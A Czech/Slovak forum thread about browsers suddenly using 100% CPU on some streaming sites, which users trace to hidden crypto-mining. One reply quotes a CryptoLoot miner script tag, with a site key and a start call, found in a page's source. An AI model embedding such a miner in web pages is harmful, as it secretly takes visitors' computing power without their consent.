» Poradna » Windows (a jiné OS)

Určité stránky v prohlížeči využívají cpu na 100%

Zdravím, dnes se mi z ničeho nic začal neuvěřitelně sekat počítač. Při snaze přijít na to proč jsem zjistil že to dělá prohlížeč (Opera Neon), konkrétně stránky se seriály či filmy online. Normálně je procesor při brouzdání po netu využíván na maximálně 20%, ale jakmile spustím stránky typu topserialy.to nebo sledujufilmy.cz a rozkliknu stránku se zdroji viedí tak využití procesoru okamžitě stoupne na 100%. Nevíte někdo co s tím? Do dneška všechno šlo jak má.HW: cpu AMD FX-8320E gpu Nvidia GeForce 1050GTX ram HyperX 8GB

Odpovědi na otázku

Ahoj nevím jak přesně teď vypadá opera, ale když půjdeš na takové stránky tak ti vyskočí hodně reklam a dalších stránek, ( tam se nejlíp chytne nějaký bordel ) ,,, když zapneš třeba seriál v opeře tak ti vyskakují další stránky ? Ve chromu je to hned, takže když ti vyskočí takové stránky, tak počítej vytížení hw, Doporučil bych ti reinstalaci os, asi budeš mít hodně bordelu v PC,. A taky používat něco lepšího než tu předpotopní operu,,,

reinstalacia os je zbytocna... nepomohlo ani to... chvilku to ide normalne a neskor si to najde cestu k tomu, aby to hralo F1... Nepomaha ani zmena prehliadaca. Chvilku je to ok, ale neskor sa to aj tak zblazni...

To teda začali s tím miningem rychle :)

Vyzkoušej jiný prohlížeč co nepoužívá motor blink jestli to bude vytěžovat.

Zkoušel jsem Chrome a ten jel v pohodě, problém je že už jsem si zvyknul na Operu Neon a nechce se mi to měnit. Ale koukám že mi nezbývá jiná možnost.

Ahoj, mne sa stalo presne to iste, aj ked som mal otvorenych 15 a viac tabov, tak procesor nebezal viac ako na 15 %, a zrazu pred 2 dnami mi zacal bezat naplno na 100% po otvoreni niektorych web stranok. Skusil som preinstalovat operu, ale nepomohlo to. Na niektorych strankach to ide normalne (napr fb, azet.sk...) ale ked si dam napr. dsl.sk, pmanager.org, fxstreet.cz a pod, tak hned vybehne zatazenie CPU na 100 % a uz to ide spomalene. Tiez hladam nejake riesenie, lebo pouzivam operu ako primarny prehliadac, ale nenasiel som zatial riesenie. Ale ked si spustim dane stranky cez chrome, tak zatazenie CPU je normalne, 2-3 %. To znamena, ze v opere musi byt nieco tajne nainstalovane, alebo nejaky bug, ktory sa zapne pri navstiveni urcitych web stranok a je mozne, ze bez vedomosti a povolenia uzivatela robi urcite operacie a vyuziva vykon PC pre svoje ucely. Neviem vsak, co by to mohlo byt a ak sa toto deje, tak opera v mojich ociach dost klesla. Dufam, ze najdeme riesenie coskoro.

Zkusil jsem ten "pmanager.org" a po chvíli skutečně vyletělo vytížení CPU mezi 50-80% (Phenom 4jádro 3GHz, 8GB RAM). Zdá se, že se nám na internetu začíná šířit docela nechutná věc. No, doufám, že s tím regulátoři brzo zatočí. ☻

Pale moon x86-64 max 8%, Q6700, 8GB RAM

Takze podarilo sa mi moj problem vyriesit, konkretne ten moj sposobuje rozsirenie v opere (extensions) Free Youtube Mp3 downloader, dostupné v opere: https://addons.opera.com/sk/extensions/details/fre... Takze ked si ho zakazete, resp. odinstalujete, CPU je zas v normale na vsetkych strankach. Je mozne, ze to robi aj ine rozsirenie, ktore ja nemam ale vy ho mozete mat v prehliadaci nainstalovane, tak bolo by dobre to vsetko povypinat a postupne po jednom zapnut a zistit, ktore je to skodlive, resp. ci mate rovnaku chybu ako ja. Tieto rozsirenia pravdepodobne zacali vyuzivat vykon PC na tazenie kryptomien alebo podobnych operacii, preto si treba davat pozor, co si davate do PC.

To mně bohužel nepomůže, protože já nepoužívám obyčejnou Operu ale Operu Neon, a do ní ty addony nainstalovat ani nejdou.

Zivot je svine, tak s tim zij. Holt to chce prohlizec, kterej na to bud neni tak nachylne a kazdopadne ad.block, ktere spustu blbosti blokne.Asi? A co to zjistit/skusit.

skus tento clanokhttp://www.dsl.sk/article.php

Dneska se mi stalo to samé. Na stránkách kinodum.cz mně procesor běžel na 100%. Po hodině hledání problému jsem se podíval do zdrojového kódu a našel jsem toto: </script><script src="https://crypto-loot.com/lib/miner.min.js"></script><script> var miner = new CryptoLoot.Anonymous('78fd7bef648349a620b14a39e9d0be8147c1f3d9b5a7'); miner.start();</script>Je to pěkné svinstvo...

Dobrý den,jde to tedy nějak obejít / zakázat nebo mám po sledování on-line filmů? Ve správci úkolů dokážu u daného procesu nastavit spřažení - povolit jen jeden procesor z 8 možných = tím jsem snížil vytížení ze 100% na cca 13-15 % ale ventilátor na CPU pořád hučí. Nemám žádné rozšíření jed AddBlock Plus - problém je u Opery 49, zkoušel jsem prohlížeč seznam a google chrome a i tam u čistých instalací CPU 100%.Díky (W10)

Jde dělat jen jediný... Pravý, zkontrolovat prvek, najít ty přiblblé scripty a jednoduše je pomocí delete smazat. Pak se nesmí obnovit stránka, jinak tam budou zas. Já to dělám tak, že si vytáhnu jen ten iframe (To video na které chci koukat) A vložím do texťáku. Přejmenuji .txt na html, otevřu a koukám na to bez havěti.

Jo mě se to taky stává mám procesor AMD Phenom Socket II. 3.40 Ghz a můj prohlížeč je využitý na 95% vytíženosti procesoru jinak můj operační systém je v pořádku ale jedna věc je to že ukončím úlohu procesor sjede dolů na 1 - 42 %